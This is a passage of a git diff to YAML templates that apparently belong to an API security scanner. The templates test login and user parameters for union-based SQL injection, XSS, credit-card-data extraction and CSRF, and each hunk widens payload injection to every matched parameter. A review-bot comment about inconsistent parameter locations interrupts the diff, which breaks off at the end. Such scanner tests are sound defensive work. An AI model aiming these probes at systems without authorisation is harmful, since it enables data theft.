@@ -150,7 +151,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -197,7 +199,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 
diff --git a/Broken-User-Authentication/UnionBasedMySQLiSubqueryExtractUsernamePayloadPOST.yml b/Broken-User-Authentication/UnionBasedMySQLiSubqueryExtractUsernamePayloadPOST.yml index 852593fb5..01d0f1d45 100644 --- a/Broken-User-Authentication/UnionBasedMySQLiSubqueryExtractUsernamePayloadPOST.yml +++ b/Broken-User-Authentication/UnionBasedMySQLiSubqueryExtractUsernamePayloadPOST.yml @@ -71,7 +71,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -103,7 +103,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -149,7 +150,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -196,7 +198,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/UnionBasedMySQLiWithURLEncodedPayloadsLoginEndpoint.yml b/Broken-User-Authentication/UnionBasedMySQLiWithURLEncodedPayloadsLoginEndpoint.yml index a9890fd56..8c592302f 100644 --- a/Broken-User-Authentication/UnionBasedMySQLiWithURLEncodedPayloadsLoginEndpoint.yml +++ b/Broken-User-Authentication/UnionBasedMySQLiWithURLEncodedPayloadsLoginEndpoint.yml 
@@ -80,7 +80,7 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nick$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^client_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|^client_id$|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -113,7 +113,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -159,7 +160,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -207,7 +209,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/UnionBasedMySQLiWithURLEncodedPayloadsPOST.yml b/Broken-User-Authentication/UnionBasedMySQLiWithURLEncodedPayloadsPOST.yml index ea896825d..b66ba3890 100644 --- a/Broken-User-Authentication/UnionBasedMySQLiWithURLEncodedPayloadsPOST.yml +++ b/Broken-User-Authentication/UnionBasedMySQLiWithURLEncodedPayloadsPOST.yml @@ -71,7 +71,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: 
@@ -102,7 +102,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -148,7 +149,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -196,7 +198,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/UnionBasedMySQLiWithUrlEncodedPayloadsGET.yml b/Broken-User-Authentication/UnionBasedMySQLiWithUrlEncodedPayloadsGET.yml index 1997fe238..bece47a41 100644 --- a/Broken-User-Authentication/UnionBasedMySQLiWithUrlEncodedPayloadsGET.yml +++ b/Broken-User-Authentication/UnionBasedMySQLiWithUrlEncodedPayloadsGET.yml @@ -71,7 +71,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -104,7 +104,8 @@ execute: requests: - req: - modify_query_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -150,7 +151,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -198,7 +200,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 
diff --git a/Broken-User-Authentication/UnionBasedPostgreSQLiCreditCardDetailsExtractionPayload.yml b/Broken-User-Authentication/UnionBasedPostgreSQLiCreditCardDetailsExtractionPayload.yml index 45b49c021..171ef84b7 100644 --- a/Broken-User-Authentication/UnionBasedPostgreSQLiCreditCardDetailsExtractionPayload.yml +++ b/Broken-User-Authentication/UnionBasedPostgreSQLiCreditCardDetailsExtractionPayload.yml @@ -80,7 +80,7 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nick$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^client_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|^client_id$|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -109,7 +109,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -161,7 +162,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${unionBasedNegativePayloads} + ${userKey}: ${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -214,7 +216,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${unionBasedNegativePayloads} + ${userKey}: ${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/UnionBasedPostgresSQLiCreditCardDetailsExtractionGET.yml b/Broken-User-Authentication/UnionBasedPostgresSQLiCreditCardDetailsExtractionGET.yml index 2c48749b4..414aa3c99 100644 
--- a/Broken-User-Authentication/UnionBasedPostgresSQLiCreditCardDetailsExtractionGET.yml +++ b/Broken-User-Authentication/UnionBasedPostgresSQLiCreditCardDetailsExtractionGET.yml @@ -72,7 +72,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -101,7 +101,8 @@ execute: requests: - req: - modify_query_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -153,7 +154,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${unionBasedNegativePayloads} + ${userKey}: ${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -206,7 +208,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${unionBasedNegativePayloads} + ${userKey}: ${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/UnionBasedPostgresSQLiCreditCardDetailsExtractionPOST.yml b/Broken-User-Authentication/UnionBasedPostgresSQLiCreditCardDetailsExtractionPOST.yml index 833e3d271..de6697590 100644 --- a/Broken-User-Authentication/UnionBasedPostgresSQLiCreditCardDetailsExtractionPOST.yml +++ b/Broken-User-Authentication/UnionBasedPostgresSQLiCreditCardDetailsExtractionPOST.yml @@ -72,7 +72,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -101,7 +101,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -153,7 +154,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${unionBasedNegativePayloads} + ${userKey}: ${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 
@@ -206,7 +208,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${unionBasedNegativePayloads} + ${userKey}: ${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/UnionBasedSQLiXSS.yml b/Broken-User-Authentication/UnionBasedSQLiXSS.yml index d462a4c7f..971d3dbf2 100644 --- a/Broken-User-Authentication/UnionBasedSQLiXSS.yml +++ b/Broken-User-Authentication/UnionBasedSQLiXSS.yml @@ -80,7 +80,7 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nick$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^client_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|^client_id$|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -107,7 +107,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${unionXSSPayloads} + ${userKey}: ${userVal}${unionXSSPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -153,7 +154,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${unionXSSNegativePayloads} + ${userKey}: ${unionXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -200,7 +202,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${unionXSSNegativePayloads} + ${userKey}: ${unionXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/UnionBasedSQLiXSSGET.yml b/Broken-User-Authentication/UnionBasedSQLiXSSGET.yml index 50f55e7c0..d11c590ea 100644 --- a/Broken-User-Authentication/UnionBasedSQLiXSSGET.yml 
+++ b/Broken-User-Authentication/UnionBasedSQLiXSSGET.yml @@ -72,7 +72,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -99,7 +99,8 @@ execute: requests: - req: - modify_query_param: - userKey: ${userVal}${unionXSSPayloads} + ${userKey}: ${userVal}${unionXSSPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -145,7 +146,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${unionXSSNegativePayloads} + ${userKey}: ${unionXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -192,7 +194,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${unionXSSNegativePayloads} + ${userKey}: ${unionXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/UnionBasedSQLiXSSPOST.yml b/Broken-User-Authentication/UnionBasedSQLiXSSPOST.yml index 988fabf92..575744534 100644 --- a/Broken-User-Authentication/UnionBasedSQLiXSSPOST.yml +++ b/Broken-User-Authentication/UnionBasedSQLiXSSPOST.yml @@ -72,7 +72,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -99,7 +99,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${unionXSSPayloads} + ${userKey}: ${userVal}${unionXSSPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -145,7 +146,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${unionXSSNegativePayloads} + ${userKey}: ${unionXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -192,7 +194,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${unionXSSNegativePayloads} + ${userKey}: ${unionXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 
diff --git a/Broken-User-Authentication/UnionBasedSQLiwithXSSandHTTPResponseSplitting.yml b/Broken-User-Authentication/UnionBasedSQLiwithXSSandHTTPResponseSplitting.yml index 24bee708e..6f681aa03 100644 --- a/Broken-User-Authentication/UnionBasedSQLiwithXSSandHTTPResponseSplitting.yml +++ b/Broken-User-Authentication/UnionBasedSQLiwithXSSandHTTPResponseSplitting.yml @@ -74,7 +74,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -91,7 +91,8 @@ execute: requests: - req: - modify_query_param: - userKey: ${userVal}${advUnionXSSPayloads} + ${userKey}: ${userVal}${advUnionXSSPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -138,7 +139,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${advUnionXSSNegativePayloads} + ${userKey}: ${advUnionXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -185,7 +187,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${advUnionXSSNegativePayloads} + ${userKey}: ${advUnionXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/UnionCaseChangeBasedMySQLDBSQLiGET.yml b/Broken-User-Authentication/UnionCaseChangeBasedMySQLDBSQLiGET.yml index 9c48ee1dd..b637721f1 100644 --- a/Broken-User-Authentication/UnionCaseChangeBasedMySQLDBSQLiGET.yml +++ b/Broken-User-Authentication/UnionCaseChangeBasedMySQLDBSQLiGET.yml @@ -72,7 +72,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -103,7 +103,8 @@ execute: requests: - req: - modify_query_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 
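Review bot: In `UnionBasedSQLiwithXSSandHTTPResponseSplitting.yml` the first request (hunk at -91) rewrites `${userKey}` under `modify_query_param`, while the two negative-payload requests (hunks at -138 and -185) rewrite it under `modify_body_param`. The filter hunk at -74 does not show which location `userKey` is extracted from, so one of the two forms is probably addressing a parameter that does not exist there. The negative control then no longer exercises the same input as the positive probe. The commit touches all three lines without aligning them, whereas the `UnionBasedSQLiXSSGET.yml` and `UnionBasedSQLiXSSPOST.yml` siblings each use one location throughout. Use the same `modify_*_param` in all three requests, matching the location named in `api_selection_filters`.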
@@ -150,7 +151,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${unionBasedNegativePayloads} + ${userKey}: ${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -197,7 +199,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${unionBasedNegativePayloads} + ${userKey}: ${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/UnionCaseChangeBasedMySQLDBSQLiOnLoginEndpoint.yml b/Broken-User-Authentication/UnionCaseChangeBasedMySQLDBSQLiOnLoginEndpoint.yml index f68521d80..c0cdf8141 100644 --- a/Broken-User-Authentication/UnionCaseChangeBasedMySQLDBSQLiOnLoginEndpoint.yml +++ b/Broken-User-Authentication/UnionCaseChangeBasedMySQLDBSQLiOnLoginEndpoint.yml @@ -80,7 +80,7 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nick$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^client_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|^client_id$|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -111,7 +111,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -158,7 +159,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${unionBasedNegativePayloads} + ${userKey}: ${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 
@@ -205,7 +207,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${unionBasedNegativePayloads} + ${userKey}: ${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/UnionCaseChangeBasedMySQLDBSQLiPOST.yml b/Broken-User-Authentication/UnionCaseChangeBasedMySQLDBSQLiPOST.yml index ab5b3a60a..ab0730358 100644 --- a/Broken-User-Authentication/UnionCaseChangeBasedMySQLDBSQLiPOST.yml +++ b/Broken-User-Authentication/UnionCaseChangeBasedMySQLDBSQLiPOST.yml @@ -72,7 +72,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -103,7 +103,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -150,7 +151,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${unionBasedNegativePayloads} + ${userKey}: ${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -197,7 +199,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${unionBasedNegativePayloads} + ${userKey}: ${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/UnionColumnBasedSQLiGET.yml b/Broken-User-Authentication/UnionColumnBasedSQLiGET.yml index 6d09c8146..41bc48c21 100644 --- a/Broken-User-Authentication/UnionColumnBasedSQLiGET.yml +++ b/Broken-User-Authentication/UnionColumnBasedSQLiGET.yml @@ -72,7 +72,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: 
@@ -110,7 +110,8 @@ execute: requests: - req: - modify_query_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -158,7 +159,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -207,7 +209,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/UnionColumnBasedSQLiLoginEndpoint.yml b/Broken-User-Authentication/UnionColumnBasedSQLiLoginEndpoint.yml index 1e06aa58f..b026d5106 100644 --- a/Broken-User-Authentication/UnionColumnBasedSQLiLoginEndpoint.yml +++ b/Broken-User-Authentication/UnionColumnBasedSQLiLoginEndpoint.yml @@ -80,7 +80,7 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nick$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^client_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|^client_id$|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -118,7 +118,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 
@@ -163,7 +164,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -209,7 +211,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/UnionColumnBasedSQLiPOST.yml b/Broken-User-Authentication/UnionColumnBasedSQLiPOST.yml index 245dfae06..b0999a843 100644 --- a/Broken-User-Authentication/UnionColumnBasedSQLiPOST.yml +++ b/Broken-User-Authentication/UnionColumnBasedSQLiPOST.yml @@ -72,7 +72,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -110,7 +110,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -155,7 +156,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -201,7 +203,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/UnionDataTypeBasedSQLiLoginEndpoint.yml b/Broken-User-Authentication/UnionDataTypeBasedSQLiLoginEndpoint.yml index f7c4dd454..b1e9b1fa7 100644 --- a/Broken-User-Authentication/UnionDataTypeBasedSQLiLoginEndpoint.yml +++ b/Broken-User-Authentication/UnionDataTypeBasedSQLiLoginEndpoint.yml 
@@ -80,7 +80,7 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nick$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^client_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|^client_id$|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -119,7 +119,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -164,7 +165,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -210,7 +212,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/UnionDataTypeBasedSQLiPOST.yml b/Broken-User-Authentication/UnionDataTypeBasedSQLiPOST.yml index 75ca68df3..bedc97300 100644 --- a/Broken-User-Authentication/UnionDataTypeBasedSQLiPOST.yml +++ b/Broken-User-Authentication/UnionDataTypeBasedSQLiPOST.yml @@ -72,7 +72,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -111,7 +111,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 
@@ -156,7 +157,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -202,7 +204,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/UnionInlineCommentBasedMySQLiGET.yml b/Broken-User-Authentication/UnionInlineCommentBasedMySQLiGET.yml index e14d2c30e..bf63770f8 100644 --- a/Broken-User-Authentication/UnionInlineCommentBasedMySQLiGET.yml +++ b/Broken-User-Authentication/UnionInlineCommentBasedMySQLiGET.yml @@ -72,7 +72,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -103,7 +103,8 @@ execute: requests: - req: - modify_query_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -149,7 +150,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -197,7 +199,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/UnionInlineCommentBasedMySQLiPOST.yml b/Broken-User-Authentication/UnionInlineCommentBasedMySQLiPOST.yml index 0cf6980aa..cd729a07e 100644 --- a/Broken-User-Authentication/UnionInlineCommentBasedMySQLiPOST.yml +++ b/Broken-User-Authentication/UnionInlineCommentBasedMySQLiPOST.yml 
@@ -72,7 +72,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -103,7 +103,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -149,7 +150,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -197,7 +199,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/UnionInlineCommentBasedMySQLionLoginEndpoint.yml b/Broken-User-Authentication/UnionInlineCommentBasedMySQLionLoginEndpoint.yml index d6e09d1ef..3727a380e 100644 --- a/Broken-User-Authentication/UnionInlineCommentBasedMySQLionLoginEndpoint.yml +++ b/Broken-User-Authentication/UnionInlineCommentBasedMySQLionLoginEndpoint.yml @@ -80,7 +80,7 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nick$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^client_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|^client_id$|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: 
@@ -111,7 +111,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -157,7 +158,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -205,7 +207,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/UserAgentCSRF.yml b/Broken-User-Authentication/UserAgentCSRF.yml index 86ce008df..a4130be53 100644 --- a/Broken-User-Authentication/UserAgentCSRF.yml +++ b/Broken-User-Authentication/UserAgentCSRF.yml @@ -78,7 +78,7 @@ api_selection_filters: for_one: key: contains_either: csrf - extract: csrf_key + extractMultiple: csrf_key value: not_contains: - ":" diff --git a/Broken-User-Authentication/UserEnumerationAccountLock.yml b/Broken-User-Authentication/UserEnumerationAccountLock.yml index 